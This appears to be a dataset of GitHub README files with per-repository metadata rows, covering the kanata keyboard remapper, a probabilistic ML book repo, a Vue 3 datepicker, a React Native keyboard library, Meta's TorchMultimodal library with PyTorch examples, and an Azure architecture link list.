[kmonad](https://github.com/kmonad/kmonad). This is an excellent project
and I recommend it if you want to try something similar.
The reason for this project's existence is that kmonad is written in Haskell
and I have no idea how to begin contributing to a Haskell project. From an
outsider's perspective I think Haskell is a great language but I really can't
wrap my head around it. And there are a few [outstanding issues](./docs/kmonad_comparison.md)
at the time of writing that make kmonad suboptimal for my personal workflows.
This project is written in Rust because Rust is my favourite programming
language and the prior work of the awesome [keyberon crate](https://github.com/TeXitoi/keyberon)
exists.
</details>
## Similar Projects
- [kmonad](https://github.com/kmonad/kmonad): The inspiration for kanata (Linux, Windows, Mac)
- [QMK](https://docs.qmk.fm/#/): Open source keyboard firmware
- [keyberon](https://github.com/TeXitoi/keyberon): Rust `#[no_std]` library intended for keyboard firmware
- [ktrl](https://github.com/ItayGarin/ktrl): Linux-only keyboard customizer with layers, a TCP server, and audio support
- [kbremap](https://github.com/timokroeger/kbremap): Windows-only keyboard customizer with layers and unicode
- [xcape](https://github.com/alols/xcape): Linux-only tap-hold modifiers
- [karabiner-elements](https://karabiner-elements.pqrs.org/): Mac-only keyboard customizer
- [capsicain](https://github.com/cajhin/capsicain): Windows-only key remapper with driver-level key interception
- [keyd](https://github.com/rvaiya/keyd): Linux-only key remapper very similar to QMK, kmonad, and kanata
- [xremap](https://github.com/k0kubun/xremap): Linux-only application-aware key remapper inspired more by Emacs key sequences vs. QMK layers/Vim modes
- [keymapper](https://github.com/houmain/keymapper): Context-aware cross-platform key remapper with a different transformation model (Linux, Windows, Mac)
### Why the list?
While kanata is the best tool for some, it may not be the best tool for
you. I'm happy to introduce you to tools that may better suit your needs. This
list is also useful as reference/inspiration for functionality that could be
added to kanata.
## Donations/Support?
The author (jtroo) will not accept monetary donations for work on kanata.
Please instead donate your time and/or money to charity.
Some links are below. These links are provided for learning and as interesting
reads. They are **not** an endorsement.
- https://www.effectivealtruism.org/
- https://www.givewell.org/
| Improve keyboard comfort and usability with advanced customization | keyboard,rust,cross-platform,linux,windows,interception-driver,keyboard-layout,mouse,mouse-emulation,macos | 42 | 43 | 451 | 1,075 | 46 | 6 | 2 |
probml/pml2-book |
# "Probabilistic Machine Learning: Advanced Topics" by Kevin Murphy.
This repo is used to store the pdf for
<a href="https://probml.github.io/pml-book/book2.html">book 2</a>
(see "releases" tab on RHS).
This lets me track downloads and issues
separately from
<a href="https://probml.github.io/pml-book/book1.html">book 1</a>.
| Probabilistic Machine Learning: Advanced Topics | null | 33 | 5 | 0 | 24 | 43 | 1 | 0 |
Vuepic/vue-datepicker | ## @vuepic/vue-datepicker
### The most complete datepicker solution for Vue 3
[![License](https://img.shields.io/npm/l/@vuepic/vue-datepicker)](https://github.com/Vuepic/vue-datepicker/blob/main/LICENSE) [![npm](https://img.shields.io/npm/v/@vuepic/vue-datepicker)](https://www.npmjs.com/package/@vuepic/vue-datepicker) ![Downloads](https://img.shields.io/npm/dm/@vuepic/vue-datepicker) [![Open issues](https://img.shields.io/github/issues-raw/Vuepic/vue-datepicker)](https://github.com/Vuepic/vue-datepicker/issues) ![CI](https://img.shields.io/github/actions/workflow/status/Vuepic/vue-datepicker/node.js.yml?branch=main&label=CI) ![Release date](https://img.shields.io/github/release-date/Vuepic/vue-datepicker)
[![Quality Gate Status](https://sonarcloud.io/api/project_badges/measure?project=Vuepic_vue-datepicker&metric=alert_status)](https://sonarcloud.io/summary/new_code?id=Vuepic_vue-datepicker)
[DOCUMENTATION](https://vue3datepicker.com/)
[StackBlitz Playground](https://stackblitz.com/edit/vuepic-vue-datepicker?file=src%2Fcomponents%2FPlayground.vue)
## Features
- Single date picker
- Range date picker
- Time picker
- Month picker
- Year picker
- Quarter picker
- Week picker
- Multiple dates select
- Multiple calendars
- Text input
- UTC support
- Timezones
- Locale support
- Week numbers
- Custom `v-model`
- Dark and light theme
- SSR support
- Highly configurable
- Accessible
- Included type definitions
## Install
```shell
# npm
npm install @vuepic/vue-datepicker
# yarn
yarn add @vuepic/vue-datepicker
# pnpm
pnpm add @vuepic/vue-datepicker
# bun
bun add @vuepic/vue-datepicker
```
### Import and register component
**Global**
```js
import { createApp } from 'vue';
import App from './App.vue';
import VueDatePicker from '@vuepic/vue-datepicker';
import '@vuepic/vue-datepicker/dist/main.css';
const app = createApp(App);
app.component('VueDatePicker', VueDatePicker);
```
**Local**
```vue
<template>
<VueDatePicker v-model="date" />
</template>
<script setup>
import { ref } from 'vue';
import VueDatePicker from '@vuepic/vue-datepicker';
import '@vuepic/vue-datepicker/dist/main.css';
const date = ref(null);
</script>
```
## Supporting the project
As you may know, maintaining an open-source project is a very time-consuming job. Your support is very much appreciated ❤️
Please ⭐️ this repository if you like the component!
You can also make a financial contribution by sponsoring this project or making a one-time donation. [Become a sponsor](https://github.com/sponsors/Vuepic)
Special thanks to our sponsors 🙏
<a href="https://hapio.io/" target="_blank">
<img src="https://avatars.githubusercontent.com/u/99868704?s=200&v=4" width="80" alt="Hapio">
</a>
<a href="https://datagridvue.com/" target="_blank">
<img src="https://raw.githubusercontent.com/nruffing/data-grid-vue/049baf296f814e3b03faf48632a7508305e14ffc/vuepress/.vuepress/public/favicon.svg" width="80" alt="Data Grid Vue
">
</a>
## Contributors
Thanks to all people who contributed to the project 🙏
<a href="https://github.com/Vuepic/vue-datepicker/graphs/contributors">
<img src="https://contrib.rocks/image?repo=Vuepic/vue-datepicker" alt="contributors" />
</a>
## Versioning
This project follows the [SemVer](https://semver.org) specification.
## License
Copyright © 2021-present [Vuepic](https://github.com/Vuepic)
[MIT](https://github.com/Vuepic/vue-datepicker/blob/master/LICENSE)
| Datepicker component for Vue 3 | vue,datetime,timepicker,datepicker,daterangepicker,datetimepicker,vue-datepicker,vue3,vue-datetimepicker | 76 | 40 | 67 | 1,644 | 14 | 2 | 3 |
kirillzyusko/react-native-keyboard-controller | # react-native-keyboard-controller
Keyboard manager which works in an identical way on both iOS and Android.
## Demonstration
<img src="./gifs/demo.gif?raw=true" width="60%">
## Key features
- mapping keyboard movement to animated values 😎
- missing `keyboardWillShow` / `keyboardWillHide` events are available on Android 😍
- module for changing soft input mode on Android 🤔
- reanimated support 🚀
- interactive keyboard dismissing 👆📱
- prebuilt components (`KeyboardStickyView`, `KeyboardAwareScrollView`, re-worked `KeyboardAvoidingView`) 📚
- `KeyboardToolbar` with easy behavior customization of _**previous**_, _**next**_ and _**done**_ buttons in the keyboard toolbar 📐
- easy focused input information retrieval 📝 🔮
- works with any navigation library 🧭
- and more is coming... Stay tuned! 😊
## Installation
Install `react-native-keyboard-controller` package from npm:
```shell
yarn add react-native-keyboard-controller
# or
npm install react-native-keyboard-controller --save
```
## Documentation
Check out our dedicated documentation page for info about this library, API reference and more: [https://kirillzyusko.github.io/react-native-keyboard-controller/](https://kirillzyusko.github.io/react-native-keyboard-controller/)
## Contributing
See the [contributing guide](CONTRIBUTING.md) to learn how to contribute to the repository and the development workflow.
## License
MIT
| Keyboard manager which works in identical way on both iOS and Android | animation,keyboard,react-native,android,ios,focused-input,avoiding-view,keyboard-toolbar | 54 | 15 | 335 | 384 | 15 | 25 | 19 |
facebookresearch/multimodal | [![Unit-tests](https://github.com/facebookresearch/multimodal/actions/workflows/unit_test.yaml/badge.svg)](https://github.com/facebookresearch/multimodal/actions/workflows/unit_test.yaml)
[![Python version](https://img.shields.io/pypi/pyversions/torchmultimodal-nightly.svg)](https://www.python.org/downloads/)
[![Downloads](https://static.pepy.tech/personalized-badge/torchmultimodal-nightly?period=total&units=international_system&left_color=blue&right_color=orange&left_text=Downloads%20(nightly))](https://pepy.tech/project/torchmultimodal-nightly)
# TorchMultimodal (Beta Release)
[**Models**](#models) | [**Example scripts**](#example-scripts) | [**Getting started**](#getting-started) | [**Code overview**](#code-overview) | [**Installation**](#installation) | [**Contributing**](#contributing) | [**License**](#license)
## Introduction
**TorchMultimodal** is a PyTorch library for training state-of-the-art multimodal multi-task models at scale, including both content understanding and generative models. TorchMultimodal contains:
- A repository of modular and composable building blocks (fusion layers, loss functions, datasets and utilities).
- A collection of common multimodal model classes built up from said building blocks with pretrained weights for canonical configurations.
- A set of examples that show how to combine these building blocks with components and common infrastructure from across the PyTorch Ecosystem to replicate state-of-the-art models published in the literature. These examples should serve as baselines for ongoing research in the field, as well as a starting point for future work.
## Models
TorchMultimodal contains a number of models, including
- ALBEF: [model class](https://github.com/facebookresearch/multimodal/blob/main/torchmultimodal/models/albef/model.py#L55), [paper](https://arxiv.org/abs/2107.07651)
- BLIP-2: [model class](https://github.com/facebookresearch/multimodal/blob/main/torchmultimodal/models/blip2/blip2.py#L39), [paper](https://arxiv.org/abs/2301.12597)
- CLIP: [model class](https://github.com/facebookresearch/multimodal/blob/main/torchmultimodal/models/clip/model.py#L37), [paper](https://arxiv.org/abs/2103.00020)
- CoCa: [model class](https://github.com/facebookresearch/multimodal/blob/main/torchmultimodal/models/coca/coca_model.py#L33), [paper](https://arxiv.org/abs/2205.01917)
- DALL-E 2: [model](https://github.com/facebookresearch/multimodal/blob/main/torchmultimodal/diffusion_labs/models/dalle2/dalle2_decoder.py#L19), [paper](https://arxiv.org/abs/2204.06125)
- FLAVA: [model class](https://github.com/facebookresearch/multimodal/blob/main/torchmultimodal/models/flava/model.py#L106), [paper](https://arxiv.org/abs/2112.04482)
- MAE/Audio MAE: [model class](https://github.com/facebookresearch/multimodal/blob/main/torchmultimodal/models/masked_auto_encoder/model.py#L42), [MAE paper](https://arxiv.org/abs/2111.06377), [Audio MAE paper](https://arxiv.org/abs/2207.06405)
- MDETR: [model class](https://github.com/facebookresearch/multimodal/blob/main/torchmultimodal/models/mdetr/model.py#L37), [paper](https://arxiv.org/abs/2104.12763)
## Example scripts
In addition to the above models, we provide example scripts for training, fine-tuning, and evaluation of models on popular multimodal tasks. Examples can be found under [examples/](https://github.com/facebookresearch/multimodal/tree/main/examples) and include
| Model | Supported Tasks |
| :--------------------------------------: | :----------------------: |
| ALBEF | [Retrieval](https://github.com/facebookresearch/multimodal/blob/main/examples/albef/README.md#retrieval) <br/> [Visual Question Answering](https://github.com/facebookresearch/multimodal/blob/main/examples/albef/README.md#visual-question-answering) |
| DDPM | [Training and Inference](https://github.com/facebookresearch/multimodal/blob/main/torchmultimodal/diffusion_labs/mnist_training.ipynb) (notebook) |
| FLAVA | [Pretraining](https://github.com/facebookresearch/multimodal/tree/main/examples/flava#launching-and-test-pretraining) <br/> [Fine-tuning](https://github.com/facebookresearch/multimodal/tree/main/examples/flava#finetuning) <br/> [Zero-shot](https://github.com/facebookresearch/multimodal/tree/main/examples/flava#coco-zero-shot)|
| MDETR | [Phrase grounding](https://github.com/facebookresearch/multimodal/tree/main/examples/mdetr#phrase-grounding) <br/> [Visual Question Answering](https://github.com/facebookresearch/multimodal/blob/main/examples/mdetr/vqa_finetune.py#L154) |
| MUGEN | [Text-to-video retrieval](https://github.com/facebookresearch/multimodal/tree/main/examples/mugen/retrieval#mugen-retrieval) <br/> [Text-to-video generation](https://github.com/facebookresearch/multimodal/tree/main/examples/mugen/generation#text-to-video-generation-with-mugen) |
| Omnivore | [Pre-training](https://github.com/facebookresearch/multimodal/tree/main/examples/omnivore#training) <br/> [Evaluation](https://github.com/facebookresearch/multimodal/tree/main/examples/omnivore#evaluating-pretrained-weight) |
## Getting started
Below we give minimal examples of how you can write a simple training or zero-shot evaluation script using components from TorchMultimodal.
<details>
<summary>FLAVA zero-shot example</summary>
```python
import torch
from PIL import Image
from torchmultimodal.models.flava.model import flava_model
from torchmultimodal.transforms.bert_text_transform import BertTextTransform
from torchmultimodal.transforms.flava_transform import FLAVAImageTransform
# Define helper function for zero-shot prediction
def predict(zero_shot_model, image, labels):
    zero_shot_model.eval()
    with torch.no_grad():
        image = image_transform(image)["image"].unsqueeze(0)
        texts = text_transform(labels)
        _, image_features = zero_shot_model.encode_image(image, projection=True)
        _, text_features = zero_shot_model.encode_text(texts, projection=True)
        scores = image_features @ text_features.t()
        probs = torch.nn.Softmax(dim=-1)(scores)
        label = labels[torch.argmax(probs)]
        print(
            "Label probabilities: ",
            {labels[i]: probs[:, i] for i in range(len(labels))},
        )
        print(f"Predicted label: {label}")
image_transform = FLAVAImageTransform(is_train=False)
text_transform = BertTextTransform()
zero_shot_model = flava_model(pretrained=True)
img = Image.open("my_image.jpg") # point to your own image
predict(zero_shot_model, img, ["dog", "cat", "house"])
# Example output:
# Label probabilities: {'dog': tensor([0.80590]), 'cat': tensor([0.0971]), 'house': tensor([0.0970])}
# Predicted label: dog
```
</details>
<details>
<summary>MAE training example</summary>
```python
import torch
from torch.utils.data import DataLoader
from torchmultimodal.models.masked_auto_encoder.model import vit_l_16_image_mae
from torchmultimodal.models.masked_auto_encoder.utils import (
CosineWithWarmupAndLRScaling,
)
from torchmultimodal.modules.losses.reconstruction_loss import ReconstructionLoss
from torchmultimodal.transforms.mae_transform import ImagePretrainTransform
mae_transform = ImagePretrainTransform()
dataset = MyDatasetClass(transforms=mae_transform) # you should define this
dataloader = DataLoader(dataset, batch_size=8)
# Instantiate model and loss
mae_model = vit_l_16_image_mae()
mae_loss = ReconstructionLoss()
# Define optimizer and lr scheduler
optimizer = torch.optim.AdamW(mae_model.parameters())
lr_scheduler = CosineWithWarmupAndLRScaling(
optimizer, max_iters=1000, warmup_iters=100 # you should set these
)
# Train one epoch
for batch in dataloader:
    optimizer.zero_grad()  # reset gradients accumulated from the previous step
    model_out = mae_model(batch["images"])
    loss = mae_loss(model_out.decoder_pred, model_out.label_patches, model_out.mask)
    loss.backward()
    optimizer.step()
    lr_scheduler.step()
```
</details>
## Code overview
### [torchmultimodal/diffusion_labs](https://github.com/facebookresearch/multimodal/tree/main/torchmultimodal/diffusion_labs)
diffusion_labs contains components for building diffusion models. For more details on these components, see [diffusion_labs/README.md](https://github.com/facebookresearch/multimodal/blob/main/torchmultimodal/diffusion_labs/README.md).
### [torchmultimodal/models](https://github.com/facebookresearch/multimodal/tree/main/torchmultimodal/models)
Look here for model classes as well as any other modeling code specific to a given architecture. For example, the directory [torchmultimodal/models/blip2](https://github.com/facebookresearch/multimodal/tree/main/torchmultimodal/models/blip2) contains modeling components specific to BLIP-2.
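As an illustration, the model builders used in the examples above live under these per-architecture directories and can be imported directly; a minimal sketch (the parameter count is only there to show the result is a regular PyTorch module):
```python
# Import paths follow torchmultimodal/models/<architecture>/..., as in the examples above
from torchmultimodal.models.flava.model import flava_model  # imported only to show the layout
from torchmultimodal.models.masked_auto_encoder.model import vit_l_16_image_mae

mae = vit_l_16_image_mae()  # a randomly initialized ViT-L/16 image MAE, a plain nn.Module
print(type(mae).__name__, sum(p.numel() for p in mae.parameters()))
```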
### [torchmultimodal/modules](https://github.com/facebookresearch/multimodal/tree/main/torchmultimodal/modules)
Look here for common generic building blocks that can be stitched together to build a new architecture. This includes [layers](https://github.com/facebookresearch/multimodal/tree/main/torchmultimodal/modules/layers) like [codebooks](https://github.com/facebookresearch/multimodal/blob/main/torchmultimodal/modules/layers/codebook.py#L31), [patch embeddings](https://github.com/facebookresearch/multimodal/blob/main/torchmultimodal/modules/layers/patch_embedding.py#L26), or [transformer encoder/decoders](https://github.com/facebookresearch/multimodal/blob/main/torchmultimodal/modules/layers/transformer.py), [losses](https://github.com/facebookresearch/multimodal/tree/main/torchmultimodal/modules/losses) like [contrastive loss with temperature](https://github.com/facebookresearch/multimodal/blob/main/torchmultimodal/modules/losses/contrastive_loss_with_temperature.py#L121) or [reconstruction loss](https://github.com/facebookresearch/multimodal/blob/main/torchmultimodal/modules/losses/reconstruction_loss.py#L10), [encoders](https://github.com/facebookresearch/multimodal/tree/main/torchmultimodal/modules/encoders) like [ViT](https://github.com/facebookresearch/multimodal/blob/main/torchmultimodal/modules/encoders/vision_transformer.py#L20) and [BERT](https://github.com/facebookresearch/multimodal/blob/main/torchmultimodal/modules/encoders/bert_text_encoder.py#L17), and [fusion modules](https://github.com/facebookresearch/multimodal/tree/main/torchmultimodal/modules/fusions) like [Deep Set fusion](https://github.com/facebookresearch/multimodal/blob/main/torchmultimodal/modules/fusions/deepset_fusion.py#L14).
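These building blocks are ordinary PyTorch modules that can also be used on their own. Below is a rough sketch that instantiates the reconstruction loss from `torchmultimodal/modules/losses` (the same class and three-argument call used in the MAE training example above) on random tensors; the tensor shapes and the 0/1 patch mask are illustrative assumptions rather than documented requirements:
```python
import torch
from torchmultimodal.modules.losses.reconstruction_loss import ReconstructionLoss

# The loss is a standalone nn.Module taking (predictions, targets, mask), as in the MAE example above
loss_fn = ReconstructionLoss()

# Assumed shapes: batch of 2, 196 patches, 768 values per patch; the 0/1 mask marks hidden patches
pred = torch.randn(2, 196, 768)
target = torch.randn(2, 196, 768)
mask = torch.randint(0, 2, (2, 196)).float()

print(loss_fn(pred, target, mask))
```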
### [torchmultimodal/transforms](https://github.com/facebookresearch/multimodal/tree/main/torchmultimodal/transforms)
Look here for common data transforms from popular models, e.g. [CLIP](https://github.com/facebookresearch/multimodal/blob/main/torchmultimodal/transforms/clip_transform.py#L349), [FLAVA](https://github.com/facebookresearch/multimodal/blob/main/torchmultimodal/transforms/flava_transform.py#L206), and [MAE](https://github.com/facebookresearch/multimodal/blob/main/torchmultimodal/transforms/mae_transform.py#L84).
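As a small sketch, the two transforms used in the FLAVA zero-shot example above can be instantiated on their own to preprocess raw inputs ("my_image.jpg" is a placeholder for any local image):
```python
from PIL import Image
from torchmultimodal.transforms.bert_text_transform import BertTextTransform
from torchmultimodal.transforms.flava_transform import FLAVAImageTransform

image_transform = FLAVAImageTransform(is_train=False)
text_transform = BertTextTransform()

# The image transform returns a dict with an "image" tensor, as used in the zero-shot example above
image_tensor = image_transform(Image.open("my_image.jpg"))["image"]  # point to your own image
# The text transform tokenizes raw strings into the format expected by encode_text
texts = text_transform(["a photo of a dog", "a photo of a cat"])

print(image_tensor.shape)
```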
## Installation
TorchMultimodal requires Python >= 3.8. The library can be installed with or without CUDA support.
The following assumes conda is installed.
### Prerequisites
1. Create and activate the conda environment
```
conda create -n torch-multimodal python=<python_version>
conda activate torch-multimodal
```
2. Install pytorch, torchvision, and torchaudio. See [PyTorch documentation](https://pytorch.org/get-started/locally/).
```
# Use the current CUDA version as listed at https://pytorch.org/get-started/locally/
# Select the nightly PyTorch build, Linux as the OS, and conda. Pick the most recent CUDA version.
conda install pytorch torchvision torchaudio pytorch-cuda=<cuda_version> -c pytorch-nightly -c nvidia
# For CPU-only install
conda install pytorch torchvision torchaudio cpuonly -c pytorch-nightly
```
### Install from binaries
Nightly binaries for Linux on Python 3.8 and 3.9 can be installed via pip wheels.
For now we only support the Linux platform through [PyPI](https://pypi.org/).
```
python -m pip install torchmultimodal-nightly
```
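A quick way to sanity-check the install is a minimal import test (a sketch; it only verifies that the package and one of the model builders used in the examples above can be imported):
```python
# Minimal import check after installation
import torch
import torchmultimodal  # package installed by torchmultimodal-nightly
from torchmultimodal.models.flava.model import flava_model  # entry point used in the examples above

print("torch version:", torch.__version__)
```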
### Building from Source
Alternatively, you can build from source and run our [examples](https://github.com/facebookresearch/multimodal/tree/main/examples):
```
git clone --recursive https://github.com/facebookresearch/multimodal.git multimodal
cd multimodal
pip install -e .
```
For developers please follow the [development installation](https://github.com/facebookresearch/multimodal/blob/main/CONTRIBUTING.md#development-installation).
## Contributing
We welcome any feature requests, bug reports, or pull requests from the community. See the [CONTRIBUTING](CONTRIBUTING.md) file for how to help out.
## License
TorchMultimodal is BSD licensed, as found in the [LICENSE](LICENSE) file.
| TorchMultimodal is a PyTorch library for training state-of-the-art multimodal multi-task models at scale. | null | 0 | 45 | 489 | 377 | 8 | 103 | 3 |
lukemurraynz/awesome-azure-architecture | ![Awesome Azure Architecture](./Awesome_Azure_Architecture.png)
# Awesome Microsoft Azure Architecture [![Awesome](https://awesome.re/badge.svg)](https://awesome.re) <!-- omit in toc -->
This is a curated list of AWESOME blogs, videos, tutorials, code, tools, and scripts related to the design and implementation of solutions in Microsoft Azure.
This list contains anything that can help with your **Microsoft Azure architecture** and quickly get you up and running when designing, planning, and implementing services that empower organizations around the planet to achieve more.
This list can be found at [aka.ms/AwesomeAzureArchitecture](https://aka.ms/AwesomeAzureArchitecture).
> Community [contributions](contributing.md) are most welcome! Feel free to submit a **pull request** with any adds/removes/changes to content!
## Contents
- [Official](#official)
- [Official Microsoft Learn Modules](#official-microsoft-learn-modules)
- [Official Docs](#official-docs)
- [Official Videos](#official-videos)
- [Official Announcements and Articles](#official-announcements-and-articles)
- [Official Books](#official-books)
- [Official Repositories and Tools](#official-repositories-and-tools)
- [Official Forums and Feedback](#official-forums-and-feedback)
- [Official Meetups and Calls](#official-meetups-and-calls)
- [Official Podcasts](#official-podcasts)
- [Community](#community)
- [Community Videos](#community-videos)
- [Community Podcasts](#community-podcasts)
- [Community Books](#community-books)
- [Community Articles](#community-articles)
- [Community Repositories and Tools](#community-repositories-and-tools)
- [Community Newsletter](#community-newsletter)
- [Community Forums](#community-forums)
- [Community Discord](#community-discord)
- [Community Slack](#community-slack)
## Official
> Links below are from official Microsoft sources, websites, and channels.
### Official Microsoft Learn Modules
Official Microsoft Learn Learning modules.
- [AZ-305: Design business continuity solutions](https://learn.microsoft.com/en-us/training/paths/design-business-continuity-solutions/?WT.mc_id=AZ-MVP-5004796)
- [AZ-305: Design data storage solutions](https://learn.microsoft.com/en-us/training/paths/design-data-storage-solutions/?WT.mc_id=AZ-MVP-5004796)
- [AZ-305: Design identity, governance, and monitor solutions](https://learn.microsoft.com/en-us/training/paths/design-identity-governance-monitor-solutions/?WT.mc_id=AZ-MVP-5004796)
- [AZ-305: Design infrastructure solutions](https://learn.microsoft.com/en-us/training/paths/design-infranstructure-solutions/?WT.mc_id=AZ-MVP-5004796)
- [AZ-700 Designing and Implementing Microsoft Azure Networking Solutions](https://learn.microsoft.com/en-us/training/paths/design-implement-microsoft-azure-networking-solutions-az-700/?WT.mc_id=AZ-MVP-5004796)
- [AZ-720: Azure Support Engineer for Connectivity Specialty](https://learn.microsoft.com/en-us/training/paths/azure-support-engineer-for-connectivity-specialty/?WT.mc_id=AZ-MVP-5004796)
- [Control Azure spending and manage bills with Microsoft Cost Management + Billing](https://learn.microsoft.com/en-us/training/paths/control-spending-manage-bills/?WT.mc_id=AZ-MVP-5004796)
- [Describe core Azure architectural components](https://learn.microsoft.com/en-us/training/modules/azure-architecture-fundamentals/?WT.mc_id=AZ-MVP-5004796)
- [Design an enterprise governance strategy](https://learn.microsoft.com/en-us/training/modules/enterprise-governance/?WT.mc_id=AZ-MVP-5004796)
- [Linux on Azure](https://learn.microsoft.com/en-us/learn/paths/azure-linux/?WT.mc_id=AZ-MVP-5004796)
- [Microsoft Azure - Microsoft Learn](https://learn.microsoft.com/en-us/training/paths/azure-linux/?WT.mc_id=AZ-MVP-5004796)
- [Microsoft Azure Connected Learning Experience (CLX)](https://clx.cloudevents.ai/events/39366311-ad15-4b90-9364-0252213842fa?wt.mc_id=AZ-MVP-5004796)
- [Microsoft Certifications](https://learn.microsoft.com/en-us/certifications/?WT.mc_id=AZ-MVP-5004796)
- [Microsoft Partner - Training Center - Role Based](https://partner.microsoft.com/en-us/training/training-center?WT.mc_id=AZ-MVP-5004796)
- [Microsoft Technical Quest](https://mtq.microsoft.com/?WT.mc_id=AZ-MVP-5004796)
### Official Docs
Official Microsoft Learn, articles, blogs, and resources.
- [AI Lab project: Responsible AI dashboard](https://www.microsoft.com/en-us/ai/ai-lab-responsible-ai-dashboard?WT.mc_id=AZ-MVP-5004796)
- [Architect multitenant solutions on Azure](https://aka.ms/multitenancy?WT.mc_id=AZ-MVP-5004796)
- [Automation adoption strategy](https://learn.microsoft.com/en-us/power-platform/guidance/automation-coe/strategy?WT.mc_id=AZ-MVP-5004796)
- [Azure Arc](https://azure.microsoft.com/en-us/services/azure-arc/?WT.mc_id=AZ-MVP-5004796)
- [Azure Arc landing zone accelerator for hybrid and multicloud](https://learn.microsoft.com/en-us/azure/cloud-adoption-framework/scenarios/hybrid/enterprise-scale-landing-zone?WT.mc_id=AZ-MVP-5004796)
- [Azure Architecture Center](https://learn.microsoft.com/en-us/azure/architecture/?WT.mc_id=AZ-MVP-5004796)
- [Azure Architecture reference architecture](https://learn.microsoft.com/en-us/azure/architecture/browse/?WT.mc_id=AZ-MVP-5004796)
- [Azure Bicep](https://learn.microsoft.com/en-us/azure/azure-resource-manager/bicep/?WT.mc_id=AZ-MVP-5004796)
- [Azure Chaos Studio documentation](https://learn.microsoft.com/en-us/azure/chaos-studio/?WT.mc_id=AZ-MVP-5004796)
- [Azure compliance documentation](https://learn.microsoft.com/en-us/azure/compliance/?WT.mc_id=AZ-MVP-5004796)
- [Azure confidential computing](https://azure.microsoft.com/en-us/solutions/confidential-compute/?WT.mc_id=AZ-MVP-5004796#overview)
- [Azure Database Migration Guides](https://learn.microsoft.com/en-us/data-migration/?WT.mc_id=AZ-MVP-5004796)
- [Azure for Partners](https://partner.microsoft.com/en-us/solutions/azure)
- [Azure Governance](https://learn.microsoft.com/en-us/azure/governance/?WT.mc_id=AZ-MVP-5004796)
- [Azure IP advantage](https://azure.microsoft.com/en-us/overview/azure-ip-advantage/?WT.mc_id=AZ-MVP-5004796)
- [Azure Lighthouse](https://learn.microsoft.com/en-us/azure/lighthouse/?WT.mc_id=AZ-MVP-5004796)
- [Azure Migrate](https://azure.microsoft.com/en-us/services/azure-migrate/?WT.mc_id=AZ-MVP-5004796)
- [Azure Migration Tool Comparison Matrix](https://aka.ms/comparemigrationtools?WT.mc_id=AZ-MVP-5004796)
- [Azure OpenAI Landing Zone reference architecture](https://techcommunity.microsoft.com/t5/azure-architecture-blog/azure-openai-landing-zone-reference-architecture/ba-p/3882102?WT.mc_id=AZ-MVP-5004796)
- [Azure products](https://azure.microsoft.com/en-us/services/?WT.mc_id=AZ-MVP-5004796)
- [Azure security baseline for Azure Virtual Desktop](https://learn.microsoft.com/en-us/security/benchmark/azure/baselines/virtual-desktop-security-baseline?WT.mc_id=AZ-MVP-5004796)
- [Azure security best practices](https://learn.microsoft.com/en-gb/azure/cloud-adoption-framework/secure/security-top-10?WT.mc_id=AZ-MVP-5004796)
- [Azure security documentation](https://learn.microsoft.com/en-us/azure/security/?WT.mc_id=AZ-MVP-5004796)
- [Azure Service-level agreements](https://azure.microsoft.com/en-us/support/legal/sla/?WT.mc_id=AZ-MVP-5004796)
- [Azure sustainability](https://azure.microsoft.com/en-gb/global-infrastructure/sustainability/?WT.mc_id=AZ-MVP-5004796)
- [Azure Table storage design](https://learn.microsoft.com/en-us/azure/storage/tables/table-storage-design?WT.mc_id=AZ-MVP-5004796)
- [Azure Virtual Datacenter](https://learn.microsoft.com/en-us/azure/cloud-adoption-framework/resources/vdc?WT.mc_id=AZ-MVP-5004796)
- [Azure VMware Solution landing zone accelerator](https://learn.microsoft.com/en-us/azure/cloud-adoption-framework/scenarios/azure-vmware/enterprise-scale-landing-zone?WT.mc_id=AZ-MVP-5004796)
- [Azure VMware Solution](https://azure.microsoft.com/en-us/services/azure-vmware/?WT.mc_id=AZ-MVP-5004796)
- [Azure application architecture fundamentals](https://learn.microsoft.com/en-us/azure/architecture/guide/?WT.mc_id=AZ-MVP-5004796)
- [Azure architecture icons](https://learn.microsoft.com/en-us/azure/architecture/icons/?WT.mc_id=AZ-MVP-5004796)
- [Azure Verified Modules](https://aka.ms/AVM)
- [Best practices in cloud applications](https://learn.microsoft.com/en-us/azure/architecture/best-practices/index-best-practices?WT.mc_id=AZ-MVP-5004796)
- [Cloud Design Patterns](https://learn.microsoft.com/en-us/azure/architecture/patterns/?WT.mc_id=AZ-MVP-5004796)
- [Cloud Services Due Diligence Checklist](https://www.microsoft.com/en-nz/trust-center/compliance/due-diligence-checklist?WT.mc_id=AZ-MVP-5004796)
- [Cloud economics](https://azure.microsoft.com/solutions/cloud-economics/?WT.mc_id=AZ-MVP-5004796#overview)
- [Compute decision tree](https://learn.microsoft.com/en-us/azure/architecture/guide/technology-choices/compute-decision-tree?WT.mc_id=AZ-MVP-5004796)
- [Create an Azure support ticket](https://azure.microsoft.com/en-us/support/create-ticket/?WT.mc_id=AZ-MVP-5004796)
- [Data decision tree](https://learn.microsoft.com/en-us/azure/architecture/guide/technology-choices/data-store-decision-tree?WT.mc_id=AZ-MVP-5004796)
- [Design for reliability](https://learn.microsoft.com/en-us/azure/architecture/framework/resiliency/design-checklist?WT.mc_id=AZ-MVP-5004796)
- [Develop your naming and tagging strategy for Azure resources](https://learn.microsoft.com/en-us/azure/cloud-adoption-framework/ready/azure-best-practices/naming-and-tagging?WT.mc_id=AZ-MVP-5004796)
- [DevOps checklist](https://learn.microsoft.com/en-us/azure/architecture/checklist/dev-ops?WT.mc_id=AZ-MVP-5004796)
- [Hands-on with AI](https://aidemos.microsoft.com/?WT.mc_id=AZ-MVP-5004796)
- [Hardware innovation for the cloud](https://azure.microsoft.com/en-us/global-infrastructure/hardware-innovation/?WT.mc_id=AZ-MVP-5004796)
- [Mainframe rehosting on Azure virtual machines](https://learn.microsoft.com/en-us/azure/virtual-machines/workloads/mainframe-rehosting/overview?WT.mc_id=AZ-MVP-5004796)
- [Microsoft Assessments](https://learn.microsoft.com/en-us/assessments/?WT.mc_id=AZ-MVP-5004796)
- [Microsoft Azure Bounty Program](https://microsoft.com/en-us/msrc/bounty-microsoft-azure?WT.mc_id=AZ-MVP-5004796)
- [Microsoft Azure Immersion Workshops](https://partner.microsoft.com/en-nz/solutions/azure/aiw?WT.mc_id=AZ-MVP-5004796)
- [Microsoft Azure Support](https://azure.microsoft.com/en-us/support/options/?WT.mc_id=AZ-MVP-5004796)
- [Microsoft Azure Well-Architected Framework](https://learn.microsoft.com/en-us/azure/architecture/framework/?WT.mc_id=AZ-MVP-5004796)
